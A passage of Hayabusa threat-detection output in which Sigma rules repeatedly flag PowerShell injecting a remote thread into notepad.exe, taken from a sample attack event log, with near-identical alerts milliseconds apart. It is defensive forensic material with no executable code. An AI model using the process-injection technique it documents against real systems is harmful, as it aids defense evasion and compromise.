Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.942 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.942 +00:00,IEWIN7,8,high,,Remote Thread Creation in Suspicious Targets,,rules/sigma/create_remote_thread/create_remote_thread_win_suspicious_targets.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.942 +00:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.942 +00:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.973 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.973 +00:00,IEWIN7,8,high,,Remote Thread Creation in Suspicious Targets,,rules/sigma/create_remote_thread/create_remote_thread_win_suspicious_targets.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.973 +00:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.973 +00:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.989 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.989 +00:00,IEWIN7,8,high,,Remote Thread Creation in Suspicious Targets,,rules/sigma/create_remote_thread/create_remote_thread_win_suspicious_targets.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.989 +00:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.989 +00:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.005 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.005 +00:00,IEWIN7,8,high,,Remote Thread Creation in Suspicious Targets,,rules/sigma/create_remote_thread/create_remote_thread_win_suspicious_targets.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.005 +00:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.005 +00:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.020 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.020 +00:00,IEWIN7,8,high,,Remote Thread Creation in Suspicious Targets,,rules/sigma/create_remote_thread/create_remote_thread_win_suspicious_targets.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.020 +00:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.020 +00:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.036 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.036 +00:00,IEWIN7,8,high,,Remote Thread Creation in Suspicious Targets,,rules/sigma/create_remote_thread/create_remote_thread_win_suspicious_targets.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.036 +00:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.036 +00:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.051 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.051 +00:00,IEWIN7,8,high,,Remote Thread Creation in Suspicious Targets,,rules/sigma/create_remote_thread/create_remote_thread_win_suspicious_targets.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.051 +00:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.051 +00:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.083 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.083 +00:00,IEWIN7,8,high,,Remote Thread Creation in Suspicious Targets,,rules/sigma/create_remote_thread/create_remote_thread_win_suspicious_targets.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.083 +00:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.083 +00:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.098 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.098 +00:00,IEWIN7,8,high,,Remote Thread Creation in Suspicious Targets,,rules/sigma/create_remote_thread/create_remote_thread_win_suspicious_targets.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.098 +00:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.098 +00:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.114 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.114 +00:00,IEWIN7,8,high,,Remote Thread Creation in Suspicious Targets,,rules/sigma/create_remote_thread/create_remote_thread_win_suspicious_targets.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.114 +00:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.114 +00:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.130 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.130 +00:00,IEWIN7,8,high,,Remote Thread Creation in Suspicious Targets,,rules/sigma/create_remote_thread/create_remote_thread_win_suspicious_targets.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.130 +00:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.130 +00:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.145 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.145 +00:00,IEWIN7,8,high,,Remote Thread Creation in Suspicious Targets,,rules/sigma/create_remote_thread/create_remote_thread_win_suspicious_targets.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.145 +00:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.145 +00:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.161 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.161 +00:00,IEWIN7,8,high,,Remote Thread Creation in Suspicious Targets,,rules/sigma/create_remote_thread/create_remote_thread_win_suspicious_targets.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.161 +00:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.161 +00:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.176 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.176 +00:00,IEWIN7,8,high,,Remote Thread Creation in Suspicious Targets,,rules/sigma/create_remote_thread/create_remote_thread_win_suspicious_targets.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.176 +00:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.176 +00:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.192 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.192 +00:00,IEWIN7,8,high,,Remote Thread Creation in Suspicious Targets,,rules/sigma/create_remote_thread/create_remote_thread_win_suspicious_targets.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.192 +00:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.192 +00:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.208 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.208 +00:00,IEWIN7,8,high,,Remote Thread Creation in Suspicious Targets,,rules/sigma/create_remote_thread/create_remote_thread_win_suspicious_targets.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.208 +00:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.208 +00:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.223 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.223 +00:00,IEWIN7,8,high,,Remote Thread Creation in Suspicious Targets,,rules/sigma/create_remote_thread/create_remote_thread_win_suspicious_targets.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.223 +00:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.223 +00:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.239 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.239 +00:00,IEWIN7,8,high,,Remote Thread Creation in Suspicious Targets,,rules/sigma/create_remote_thread/create_remote_thread_win_suspicious_targets.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.239 +00:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.239 +00:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.270 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.270 +00:00,IEWIN7,8,high,,Remote Thread Creation in Suspicious Targets,,rules/sigma/create_remote_thread/create_remote_thread_win_suspicious_targets.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.270 +00:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.270 +00:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.286 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: 